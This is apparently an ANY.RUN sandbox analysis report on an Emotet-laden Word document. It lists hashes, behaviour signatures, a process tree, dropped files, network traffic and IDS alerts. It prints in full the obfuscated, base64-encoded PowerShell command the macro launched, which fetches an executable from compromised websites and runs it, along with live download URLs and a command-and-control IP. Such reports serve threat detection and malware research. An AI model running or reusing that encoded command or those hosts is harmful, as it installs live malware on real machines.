analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

CBMP1VE 2020 9月 29.doc

Full analysis: https://app.any.run/tasks/be539105-594d-4005-8eda-ec5b35e7e376
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 30, 2020, 11:53:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
opendir
loader
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Tempora., Author: Gabriel Muller, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Sep 28 22:18:00 2020, Last Saved Time/Date: Mon Sep 28 22:18:00 2020, Number of Pages: 1, Number of Words: 3380, Number of Characters: 19268, Security: 8
MD5:

DD473B5A8FDF3ADBB950D818F029B83E

SHA1:

77010693582BCE976033B07022ACB46A0002BA77

SHA256:

0383ECFDF99C78B9251B7857DDB9C66A992742CBF247AABB1A300CA9A1B4806A

SSDEEP:

1536:mxRD3bNqfNpu39IId5a6XP3Mg8afyq1Tqc380o:ER1qf69xak3MgxygqI80o

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Onj2qmzt.exe (PID: 3996)
      • api-ms-win-service-core-l1-1-0.exe (PID: 3824)
    • Connects to CnC server

      • api-ms-win-service-core-l1-1-0.exe (PID: 3824)
    • Changes the autorun value in the registry

      • api-ms-win-service-core-l1-1-0.exe (PID: 3824)
    • EMOTET was detected

      • api-ms-win-service-core-l1-1-0.exe (PID: 3824)
  • SUSPICIOUS

    • Creates files in the user directory

      • POwersheLL.exe (PID: 3136)
    • PowerShell script executed

      • POwersheLL.exe (PID: 3136)
    • Executed via WMI

      • POwersheLL.exe (PID: 3136)
    • Executable content was dropped or overwritten

      • Onj2qmzt.exe (PID: 3996)
      • POwersheLL.exe (PID: 3136)
    • Starts itself from another location

      • Onj2qmzt.exe (PID: 3996)
    • Reads Internet Cache Settings

      • api-ms-win-service-core-l1-1-0.exe (PID: 3824)
    • Connects to server without host name

      • api-ms-win-service-core-l1-1-0.exe (PID: 3824)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2560)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2560)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Tempora.
Subject: -
Author: Gabriel Muller
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:09:28 21:18:00
ModifyDate: 2020:09:28 21:18:00
Pages: 1
Words: 3380
Characters: 19268
Security: Locked for annotations
Company: -
Lines: 160
Paragraphs: 45
CharCountWithSpaces: 22603
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CodePage: Unicode UTF-16, little endian
LocaleIndicator: 1033
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe onj2qmzt.exe #EMOTET api-ms-win-service-core-l1-1-0.exe

Process information

PID
CMD
Path
Indicators
Parent process
2560"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\CBMP1VE 2020 9月 29.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3136POwersheLL -ENCOD JABNAHYAbQA5AHgAZABwAD0AKAAoACcARwB2AHkANgAnACsAJwB0ACcAKwAnAF8AJwApACsAJwA4ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUATgB2ADoAVQBzAEUAUgBwAHIATwBGAGkATABlAFwAVAA0AFkAeQBlAFIAOABcAGgASgBfAE0ARgBaAFYAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAHIAZQBjAHQAbwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBjAGAAVQByAGkAYABUAGAAWQBwAFIATwBgAFQATwBDAE8ATAAiACAAPQAgACgAJwB0AGwAJwArACgAJwBzACcAKwAnADEAMgAsACAAdABsAHMAJwArACcAMQAxACwAJwApACsAJwAgACcAKwAnAHQAbAAnACsAJwBzACcAKQA7ACQAQgAzAHUAbwBuAHQAMQAgAD0AIAAoACgAJwBPAG4AagAnACsAJwAyACcAKQArACgAJwBxACcAKwAnAG0AegAnACkAKwAnAHQAJwApADsAJABJAGQAdAA2ADQAZQBuAD0AKAAoACcARAA4ACcAKwAnADMAaAAnACkAKwAoACcANAAnACsAJwB1AHkAJwApACkAOwAkAFoAcgB0AG8AMwA2AGYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAYwAnACsAJwBHACcAKwAoACcATAAnACsAJwBUADQAJwApACsAKAAnAHkAJwArACcAeQBlACcAKQArACgAJwByACcAKwAnADgAYwAnACkAKwAnAEcAJwArACgAJwBMACcAKwAnAEgAagBfACcAKQArACgAJwBtACcAKwAnAGYAegB2AGMARwBMACcAKQApAC4AIgBSAGUAYABQAEwAQQBDAGUAIgAoACgAWwBDAGgAYQByAF0AOQA5ACsAWwBDAGgAYQByAF0ANwAxACsAWwBDAGgAYQByAF0ANwA2ACkALAAnAFwAJwApACkAKwAkAEIAMwB1AG8AbgB0ADEAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABJAG8AdAA1AGMAegBrAD0AKAAoACcATQAnACsAJwAzADMAcQA2ADAAJwApACsAJwBmACcAKQA7ACQATgByAG8AbQBvAGcAcgA9AC4AKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAZQBjAHQAJwApACAAbgBFAFQALgB3AGUAQgBDAEwASQBFAG4AdAA7ACQARQBvADYAMQB4AGMAbwA9ACgAKAAnAGgAdAB0AHAAJwArACcAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBlACcAKwAnAGQAdQAnACsAJwAuAGoAJwArACgAJwBtAHMAJwArACcAdgAnACkAKwAoACcAYwBsAGEAcwBzAC4AYwBvAG0AJwArACcALwAnACsAJwB3AHAALQBpAG4AJwArACcAYwAnACkAKwAoACcAbAB1AGQAJwArACcAZQBzACcAKQArACcALwBzACcAKwAoACcAWgAnACsAJwBtAGoAJwApACsAKAAnAFMAcQAnACsAJwAvACoAJwArACcAaAB0ACcAKQArACcAdABwACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AJwArACcAZABhAHIAJwApACsAJwBrACcAKwAoACcAYgBsAGUAcwAnACsAJwBzACcAKQArACcAaQBuACcAKwAoACcAZwAuACcAKwAnAG4AZQAnACkAKwAoACcAdAAvAGUAJwArACcANAB3AGYAdAAnACkAKwAnAGsAJwArACcAcABuACcAKwAoACcALwBLAE4AQQBPADkALwAqAGgAdAB0AHAAOgAvAC8AdAAnACsAJwByAGEAJwArACcAbgAnACsAJwBjAGkAJwArACcAcwAnACsAJwBjAG8AbgBzACcAKQArACgAJwB1ACcAKwAnAGwAdABpACcAKQArACcAbgBnACcAKwAnAC4AYwAnACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAcAAtAGEAJwApACsAJwBkACcAKwAoACcAbQBpAG4ALwAnACsAJwBFAEUAJwApACsAJwBvAEYAJwArACcALwAqACcAKwAoACcAaAB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwBkAGUAdgBhAG4AJwArACcAeQBhAHMAJwArACcAdABvAHIAZQAnACkAKwAoACcALgBjACcAKwAnAG8AJwApACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBjAG8AJwArACcAbgAnACsAJwB0AGUAJwApACsAJwBuACcAKwAoACcAdAAvACcAKwAnADkASgA1ADYAJwApACsAJwBqAHUAJwArACcAQQAnACsAKAAnAC8AJwArACcAKgBoAHQAJwArACcAdABwACcAKQArACcAOgAvACcAKwAnAC8AaAAnACsAKAAnAGUAJwArACcAYQBsAHQAaABjAHUAJwArACcAcgBlACcAKQArACcAYQAnACsAKAAnAHQAJwArACcAaABvAG0AJwApACsAKAAnAGUALgAnACsAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBBAEwARgAnACsAJwBBAF8AJwApACsAJwBEAEEAJwArACcAVAAnACsAKAAnAEEALwAnACsAJwBpACcAKQArACgAJwBLACcAKwAnAFMAZAAnACkAKwAnAEMAJwArACgAJwBLACcAKwAnADYALwAqAGgAJwArACcAdAB0ACcAKwAnAHAAOgAnACkAKwAnAC8ALwAnACsAJwB3AHcAJwArACcAdwAnACsAJwAuAHMAJwArACgAJwB6AHcAJwArACcAeQAnACkAKwAnAG0AJwArACgAJwBhAGwAJwArACcAbAAuACcAKQArACcAYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AJwApACsAKAAnAG4AdABlACcAKwAnAG4AJwArACcAdAAvACcAKQArACcAagAnACsAKAAnADIAJwArACcAOQBtACcAKQArACgAJwB2ACcAKwAnAFMALwAqAGgAdAB0ACcAKwAnAHAAOgAvACcAKQArACgAJwAvAHcAdwAnACsAJwB3AC4AJwApACsAKAAnAGoAbwByAG4AYwBvAC4AYwBvACcAKwAnAG0AJwArACcALwB3ACcAKwAnAHAAJwArACcALQAnACkAKwAnAGEAJwArACgAJwBkACcAKwAnAG0AaQBuACcAKQArACgAJwAvACcAKwAnAFUAVAAwACcAKQArACgAJwB4AEIAJwArACcASgB3AC8AJwApACkALgAiAHMAYABwAGwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVgBtAGwAXwA4AHIAcQA9ACgAKAAnAEgAJwArACcAeQBvACcAKQArACgAJwBkAGUAJwArACcAbAAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAQgBrAHUAXwB0AGQAXwAgAGkAbgAgACQARQBvADYAMQB4AGMAbwApAHsAdAByAHkAewAkAE4AcgBvAG0AbwBnAHIALgAiAEQAYABvAGAAdwBuAEwATwBhAGQAZgBpAGwARQAiACgAJABCAGsAdQBfAHQAZABfACwAIAAkAFoAcgB0AG8AMwA2AGYAKQA7ACQAUABuAGYAOQBmAHoAdAA9ACgAKAAnAFYAZwBvAGEAJwArACcAbgAnACkAKwAnADkAJwArACcAbQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQAWgByAHQAbwAzADYAZgApAC4AIgBMAEUAYABOAGcAYABUAEgAIgAgAC0AZwBlACAAMgAzADIANQAzACkAIAB7AC4AKAAnAEkAbgB2AG8AJwArACcAawBlAC0ASQAnACsAJwB0AGUAbQAnACkAKAAkAFoAcgB0AG8AMwA2AGYAKQA7ACQAWABvAHEAaQB5AHIANQA9ACgAKAAnAEIAdQBvACcAKwAnAGwAaAAnACkAKwAnAGkAZgAnACkAOwBiAHIAZQBhAGsAOwAkAFkANgByADUAaAAxAGUAPQAoACcAUwAnACsAJwBmACcAKwAoACcAMgBkAHEAJwArACcAZABuACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABGAG0AaQA5AGsAdgA5AD0AKAAnAEkAXwAnACsAKAAnAGQAZgBlACcAKwAnAG0AeAAnACkAKQA= C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3996"C:\Users\admin\T4yyer8\Hj_mfzv\Onj2qmzt.exe" C:\Users\admin\T4yyer8\Hj_mfzv\Onj2qmzt.exe
POwersheLL.exe
User:
admin
Company:
Intech Solutions
Integrity Level:
MEDIUM
Description:
MS masked edit control at the heart
Exit code:
0
Version:
2.27.0.5
3824"C:\Users\admin\AppData\Local\mciwave\api-ms-win-service-core-l1-1-0.exe"C:\Users\admin\AppData\Local\mciwave\api-ms-win-service-core-l1-1-0.exe
Onj2qmzt.exe
User:
admin
Company:
Intech Solutions
Integrity Level:
MEDIUM
Description:
MS masked edit control at the heart
Version:
2.27.0.5
Total events
2 369
Read events
1 480
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2560WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA5E5.tmp.cvr
MD5:
SHA256:
3136POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SDEZIX7CFU8MVAVN8QEB.temp
MD5:
SHA256:
3996Onj2qmzt.exeC:\Users\admin\AppData\Local\Temp\~DF3C37E53D27F8B920.TMP
MD5:
SHA256:
2560WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:DB7ED30F2AF244B37602E9A8FA40BC69
SHA256:6C261EB204362985E24872BAC097DA758424FC98F9EA7C6D717C17385EC5961A
3136POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:4028388263805ABA00088A0BA4EEA515
SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948
2560WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$MP1VE 2020 9月 29.docpgc
MD5:2A1173840FD9ECF7FCA36418FFA1CC81
SHA256:6F7377DE329E560F1FCEC679DD0B9FD77DBC6F5780A7F9A291307AA118DC801A
3996Onj2qmzt.exeC:\Users\admin\AppData\Local\mciwave\api-ms-win-service-core-l1-1-0.exeexecutable
MD5:6CA057CBBDEA55752954C8CB523BFC5A
SHA256:FEF2CD14F228CB866A39B186342C12E3DF7D80B1044E3B0A7BEF7EE81769FC29
3136POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bb2e5.TMPbinary
MD5:4028388263805ABA00088A0BA4EEA515
SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948
2560WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:50742E65DB2DB0C410E463BA85DDEA0D
SHA256:89FA0F5B2B5D869A591A26C889892D907BC5FB39D632825174BC4378853A31DA
3136POwersheLL.exeC:\Users\admin\T4yyer8\Hj_mfzv\Onj2qmzt.exeexecutable
MD5:6CA057CBBDEA55752954C8CB523BFC5A
SHA256:FEF2CD14F228CB866A39B186342C12E3DF7D80B1044E3B0A7BEF7EE81769FC29
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3824
api-ms-win-service-core-l1-1-0.exe
POST
200
104.193.103.61:80
http://104.193.103.61/ibdq/KbaGIbDna0SgKqeW/eqoEwvGnvKXZ/
US
binary
132 b
malicious
3136
POwersheLL.exe
GET
200
160.153.210.213:80
http://edu.jmsvclass.com/wp-includes/sZmjSq/
US
executable
332 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3136
POwersheLL.exe
160.153.210.213:80
edu.jmsvclass.com
GoDaddy.com, LLC
US
suspicious
3824
api-ms-win-service-core-l1-1-0.exe
104.193.103.61:80
Delcom, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
edu.jmsvclass.com
  • 160.153.210.213
suspicious

Threats

PID
Process
Class
Message
3136
POwersheLL.exe
A Network Trojan was detected
ET POLICY Terse Named Filename EXE Download - Possibly Hostile
3136
POwersheLL.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3136
POwersheLL.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3136
POwersheLL.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3824
api-ms-win-service-core-l1-1-0.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M10
No debug info